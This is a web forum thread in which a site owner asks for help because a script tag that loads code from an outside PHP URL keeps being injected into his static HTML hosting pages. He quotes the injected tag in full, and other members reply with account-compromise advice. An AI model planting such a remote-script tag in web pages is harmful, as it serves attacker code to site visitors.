Jump to content

HTML page that can't be hacked XSS

joshbb

By joshbb
in HTML Help

 Share

Recommended Posts

Soldier Jane Newbie

Soldier Jane

Posted
Posted

Guidelines for what exactly? Also, this is a PHP forum not ASP, you may want to try posting elsewhere, perhaps even the HTML one. Or are you asking how to generate static HTML pages using PHP?

 

Oh, and XSS is covered in a tutorial on this very site: http://www.phpfreaks.com/tutorial/php-security

joshbb Newbie

joshbb

Posted
  • Author
Posted

Please see following page: Template

 

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title></title>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta http-equiv="Content-Style-Type" content="text/css" />

<link href="style.css" rel="stylesheet" type="text/css" />

<link href="layout.css" rel="stylesheet" type="text/css" />

<script src="js/cufon-yui.js" type="text/javascript"></script>

<script src="js/cufon-replace.js" type="text/javascript"></script>

<script src="js/Futura_Md_BT_italic_400.font.js" type="text/javascript"></script>

<script src="js/Futura_Md_BT_italic_700.font.js" type="text/javascript"></script>

<!--[if lt IE 7]>

<link href="ie_style.css" rel="stylesheet" type="text/css" />

<![endif]-->

</head>

 

<body id="page1">

  <!-- header -->

  <div id="header">

  <div class="row-1">

      <div class="container">

        <div class="logo"><a href="index.html"><img alt="" src="images/logo.jpg" /></a></div>

            <ul class="nav">

            <li><a href="index.html" class="current">Home</a>|</li>

              <li><a href="index-1.html">Hosting</a>|</li>

              <li><a href="#">Domains</a>|</li>

              <li><a href="#">Web Design</a>|</li>

              <li><a href="#">Support</a>|</li>

              <li><a href="#">Solutions</a>|</li>

              <li><a href="#">Affiliates</a>|</li>

              <li><a href="#">Contacts</a></li>

            </ul>

        </div>

      </div>

      <div class="row-2">

      <div class="bg">

        <div class="container">

            <div class="indent">

              <img alt="" src="images/slogan.jpg" />

                  <div class="indent">

                  <p>Professional web hosting with easy website builder, unlimited traffic and a range of advanced <a href="#">web hosting</a> tools included.</p>

                    <a href="#"><img alt="" src="images/button.gif" /></a>

                  </div>

              </div>

            </div>

        </div>

      </div>

  </div>

  <!-- content -->

  <div id="content" class="extra-bg">

  <div class="row-1">

      <div class="container">

        <ul class="banners">

            <li>

                  <h2 class="icon1">Domain name</h2>

                  <h4>Registrations from $9.50</h4>

                  <ul>

                    <li><a href="#">NEW:  domain privacy</a></li>

                    <li><a href="#">Easy domain trasfers</a></li>

                    <li><a href="#">Advanced DNS control</a></li>

                    <li><a href="#">Personalised e-mail</a></li>

                  </ul>

                  <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div>

              </li>

              <li>

                  <h2 class="icon2 alt">Dedicated <strong>servers</strong></h2>

                  <h4>From $45.50 p/month</h4>

                  <ul>

                    <li><a href="#">50% OFF for 3 month</a></li>

                    <li><a href="#">Unlimited bandwidth</a></li>

                    <li><a href="#">Remote server control</a></li>

                    <li><a href="#">Secure private network</a></li>

                  </ul>

                  <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div>

              </li>

              <li>

                  <h2 class="icon3">Broadband</h2>

                  <h4>From $34.50 p/month</h4>

                  <ul>

                    <li><a href="#">Unlimited downloads</a></li>

                    <li><a href="#">No ties or restrictions</a></li>

                    <li><a href="#">Static IP addresses</a></li>

                    <li><a href="#">Low cotention ratios</a></li>

                  </ul>

                  <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div>

              </li>

              <li class="last">

                  <h2 class="icon4">Web hosting</h2>

                  <h4>From only $3.59</h4>

                  <ul>

                    <li><a href="#">50% OFF for 3 month</a></li>

                    <li><a href="#">Unlimited bandwidth</a></li>

                    <li><a href="#">Windows & Linux</a></li>

                    <li><a href="#">Easy website builder</a></li>

                  </ul>

                  <div class="wrapper"><a href="#">View details</a><a href="#" class="link1"><em><b>Signup Now!</b></em></a></div>

              </li>

            </ul>

            <ul class="top-proposals">

            <li><a href="#"><img alt="" src="images/banner1.jpg" /></a></li>

              <li class="last"><a href="#"><img alt="" src="images/banner1.jpg" /></a></li>

            </ul>

        </div>

      </div>

      <div class="row-2">

      <div class="container">

        <div class="wrapper">

            <div class="col-1">

              <h3>Dedicated</h3>

                  Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo   <a href="#"><img alt="" src="images/arrow2.gif" /></a>

              </div>

              <div class="col-2">

              <h3>New Customer</h3>

                  Ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo   <a href="#"><img alt="" src="images/arrow2.gif" /></a>

              </div>

              <div class="col-3">

              <h3>Transfer Customer</h3>

                  Lorem ipsum dolor sit amet, consectetuer adipi- scing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo   <a href="#"><img alt="" src="images/arrow2.gif" /></a>

              </div>

            </div>

        </div>

      </div>

  </div>

  <!-- footer -->

  <div id="footer">

  <div class="container">

      wEb hOSTING © 2010    <a href="index-2.html">Privacy Policy</a>

      </div>

  </div>

  <script type="text/javascript"> Cufon.now(); </script>

</body>

</html>

 

 

How can I protect above page from XSS, these are only static pages. having no input from client.

 

joshbb Newbie

joshbb

Posted
  • Author
Posted

-- I am amazed how that guy inject code to my static HTML page.

-- Maybe he/she is using his browser to insert malicious code into HTML page.

-- Also problem is that google places label on your site. I used webmaster tools and removed    that label. But XSS is most frequent about twice a day.

-- His injected code is as under:

<script src=http://tdisac.com.pe/images/_vti_inf.php ></script>

 

this is very serious problem with my site. Need help.

Mchl Regular Member

Mchl

Posted
Posted

XSS attacks are only possible with dynamic pages. Static HTML can only be modified by someone acquiring access to your hosting account.

 

In other words: change your passwords, do not store passwords in your ftp program, check your PC for malware, check for vulnerabilities on other pages on this account.

haku Regular Member

haku

Posted
Posted

If he is changing text on your static files, it sounds like he has access to your server and/or is running a script on your server that adds the script tag into files automatically.

 

As mchl said, change your password. See if that stops it. If not you are going to have to clean out the files on your server.

joshbb Newbie

joshbb

Posted
  • Author
Posted

-- I changed my ftp password but XSS occur frequently.

-- Note that attacker does not change the text of my pages. Also its not automatic script because I traced out attacking patterns, some time site is free from XSS for 2 or 3 days at weekend.

-- What I realized is that attacker used his browser for submitting malware code into my site.

 

I want a page that does not accept any inputs from client end. It shows only what is on that page.

 

Mchl Regular Member

Mchl

Posted
Posted

XSS attacks are only possible with dynamic pages. Static HTML can only be modified by someone acquiring access to your hosting account.

 

In other words: change your passwords, do not store passwords in your ftp program, check your PC for malware, check for vulnerabilities on other pages on this account.

joshbb Newbie

joshbb

Posted
  • Author
Posted

-- I am using reseller hosting, and I dont have direct access to change my ftp

-- I have to send request to owner of that software house to change ftp password.

-- My account info is open to him also.

-- Thats why I was thinking to change hosting.

 

I have installed licensed Kaspersky 6.0.3 and Trojan remover. I dont think my pc have any types of trojans.

 

Also note that XSS is very frequent means no have have much time to put XSS on about 50pages twice a day for so long time that is two months.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.